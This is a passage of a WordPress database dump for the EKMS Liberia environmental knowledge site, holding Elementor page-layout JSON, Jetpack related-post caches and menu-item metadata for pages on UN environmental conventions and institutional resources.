Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(18618,2734,'_elementor_version','2.7.5'),(18619,2734,'_elementor_template_type','wp-page'),(18620,2734,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(18624,1776,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628903256;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3240;}i:1;a:1:{s:2:\"id\";i:3099;}i:2;a:1:{s:2:\"id\";i:1722;}}}}'),(18675,84,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625791210;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:74;}i:1;a:1:{s:2:\"id\";i:335;}i:2;a:1:{s:2:\"id\";i:68;}i:3;a:1:{s:2:\"id\";i:2503;}i:4;a:1:{s:2:\"id\";i:9;}i:5;a:1:{s:2:\"id\";i:2904;}}}}'),(18676,2503,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625791208;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:9;}i:1;a:1:{s:2:\"id\";i:68;}i:2;a:1:{s:2:\"id\";i:74;}i:3;a:1:{s:2:\"id\";i:335;}i:4;a:1:{s:2:\"id\";i:2904;}i:5;a:1:{s:2:\"id\";i:72;}}}}'),(18677,110,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625748068;s:7:\"payload\";a:0:{}}}'),(18678,108,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625791208;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:76;}i:1;a:1:{s:2:\"id\";i:68;}i:2;a:1:{s:2:\"id\";i:74;}i:3;a:1:{s:2:\"id\";i:2904;}i:4;a:1:{s:2:\"id\";i:9;}i:5;a:1:{s:2:\"id\";i:2503;}}}}'),(18679,106,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625791208;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:335;}i:1;a:1:{s:2:\"id\";i:102;}i:2;a:1:{s:2:\"id\";i:68;}i:3;a:1:{s:2:\"id\";i:87;}i:4;a:1:{s:2:\"id\";i:76;}i:5;a:1:{s:2:\"id\";i:80;}}}}'),(18680,102,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625791208;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:74;}i:1;a:1:{s:2:\"id\";i:335;}i:2;a:1:{s:2:\"id\";i:68;}i:3;a:1:{s:2:\"id\";i:9;}i:4;a:1:{s:2:\"id\";i:2503;}i:5;a:1:{s:2:\"id\";i:80;}}}}'),(18681,91,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625791209;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:9;}i:1;a:1:{s:2:\"id\";i:74;}i:2;a:1:{s:2:\"id\";i:68;}i:3;a:1:{s:2:\"id\";i:335;}i:4;a:1:{s:2:\"id\";i:102;}i:5;a:1:{s:2:\"id\";i:2904;}}}}'),(18682,89,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1628336753;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:9;}i:1;a:1:{s:2:\"id\";i:68;}i:2;a:1:{s:2:\"id\";i:335;}i:3;a:1:{s:2:\"id\";i:74;}i:4;a:1:{s:2:\"id\";i:87;}i:5;a:1:{s:2:\"id\";i:80;}}}}'),(18683,87,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625791207;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:335;}i:1;a:1:{s:2:\"id\";i:9;}i:2;a:1:{s:2:\"id\";i:68;}i:3;a:1:{s:2:\"id\";i:2503;}i:4;a:1:{s:2:\"id\";i:74;}i:5;a:1:{s:2:\"id\";i:84;}}}}'),(18684,9,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1629032533;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:335;}i:1;a:1:{s:2:\"id\";i:74;}i:2;a:1:{s:2:\"id\";i:68;}i:3;a:1:{s:2:\"id\";i:2503;}i:4;a:1:{s:2:\"id\";i:2904;}i:5;a:1:{s:2:\"id\";i:87;}}}}'),(18685,82,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625791211;s:7:\"payload\";a:5:{i:0;a:1:{s:2:\"id\";i:2904;}i:1;a:1:{s:2:\"id\";i:9;}i:2;a:1:{s:2:\"id\";i:68;}i:3;a:1:{s:2:\"id\";i:72;}i:4;a:1:{s:2:\"id\";i:102;}}}}'),(18686,80,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625791211;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:74;}i:1;a:1:{s:2:\"id\";i:2503;}i:2;a:1:{s:2:\"id\";i:335;}i:3;a:1:{s:2:\"id\";i:2904;}i:4;a:1:{s:2:\"id\";i:68;}i:5;a:1:{s:2:\"id\";i:72;}}}}'),(18687,76,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625791211;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:68;}i:1;a:1:{s:2:\"id\";i:74;}i:2;a:1:{s:2:\"id\";i:2503;}i:3;a:1:{s:2:\"id\";i:335;}i:4;a:1:{s:2:\"id\";i:9;}i:5;a:1:{s:2:\"id\";i:108;}}}}'),(18688,74,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625791212;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:68;}i:1;a:1:{s:2:\"id\";i:335;}i:2;a:1:{s:2:\"id\";i:2503;}i:3;a:1:{s:2:\"id\";i:9;}i:4;a:1:{s:2:\"id\";i:84;}i:5;a:1:{s:2:\"id\";i:2904;}}}}'),(18689,72,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1625791212;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:2503;}i:1;a:1:{s:2:\"id\";i:74;}i:2;a:1:{s:2:\"id\";i:2904;}i:3;a:1:{s:2:\"id\";i:9;}i:4;a:1:{s:2:\"id\";i:335;}i:5;a:1:{s:2:\"id\";i:80;}}}}'),(18690,68,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1628590146;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:74;}i:1;a:1:{s:2:\"id\";i:9;}i:2;a:1:{s:2:\"id\";i:335;}i:3;a:1:{s:2:\"id\";i:80;}i:4;a:1:{s:2:\"id\";i:2503;}i:5;a:1:{s:2:\"id\";i:72;}}}}'),(18691,335,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1628683294;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:9;}i:1;a:1:{s:2:\"id\";i:68;}i:2;a:1:{s:2:\"id\";i:74;}i:3;a:1:{s:2:\"id\";i:80;}i:4;a:1:{s:2:\"id\";i:2503;}i:5;a:1:{s:2:\"id\";i:2904;}}}}'),(18740,1598,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629066230;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2704;}i:1;a:1:{s:2:\"id\";i:1594;}i:2;a:1:{s:2:\"id\";i:1610;}}}}'),(18744,2746,'_menu_item_type','custom'),(18745,2746,'_menu_item_menu_item_parent','129'),(18746,2746,'_menu_item_object_id','2746'),(18747,2746,'_menu_item_object','custom'),(18748,2746,'_menu_item_target','_blank'),(18749,2746,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18750,2746,'_menu_item_xfn',''),(18751,2746,'_menu_item_url','https://securedrive.ekmsliberia.info/'),(18753,2746,'_menu_item_template',''),(18754,2746,'_menu_item_mega_template','0'),(18755,2746,'_menu_item_nolink',''),(18756,2746,'_menu_item_category_post',''),(18757,2746,'_menu_item_megamenu',''),(18758,2746,'_menu_item_megamenu_auto_width',''),(18759,2746,'_menu_item_megamenu_col',''),(18760,2746,'_menu_item_megamenu_heading',''),(18761,2746,'_menu_item_megamenu_widgetarea','0'),(18762,2746,'_menu_item_icon',''),(18763,2746,'_elementor_controls_usage','a:0:{}'),(18764,2747,'_menu_item_type','custom'),(18765,2747,'_menu_item_menu_item_parent','0'),(18766,2747,'_menu_item_object_id','2747'),(18767,2747,'_menu_item_object','custom'),(18768,2747,'_menu_item_target','_blank'),(18769,2747,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18770,2747,'_menu_item_xfn',''),(18771,2747,'_menu_item_url','https://securedrive.ekmsliberia.info/'),(18773,2747,'_menu_item_template',''),(18774,2747,'_menu_item_mega_template','0'),(18775,2747,'_menu_item_nolink',''),(18776,2747,'_menu_item_category_post',''),(18777,2747,'_menu_item_megamenu',''),(18778,2747,'_menu_item_megamenu_auto_width',''),(18779,2747,'_menu_item_megamenu_col',''),(18780,2747,'_menu_item_megamenu_heading',''),(18781,2747,'_menu_item_megamenu_widgetarea','0'),(18782,2747,'_menu_item_icon',''),(18783,2747,'_elementor_controls_usage','a:0:{}'),(18784,1588,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629064757;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1600;}i:1;a:1:{s:2:\"id\";i:1586;}i:2;a:1:{s:2:\"id\";i:1602;}}}}'),(18785,2748,'_edit_lock','1574709240:1'),(18786,2748,'_edit_last','1'),(18787,2749,'_wp_attached_file','2019/11/featured_ci_project.jpg'),(18788,2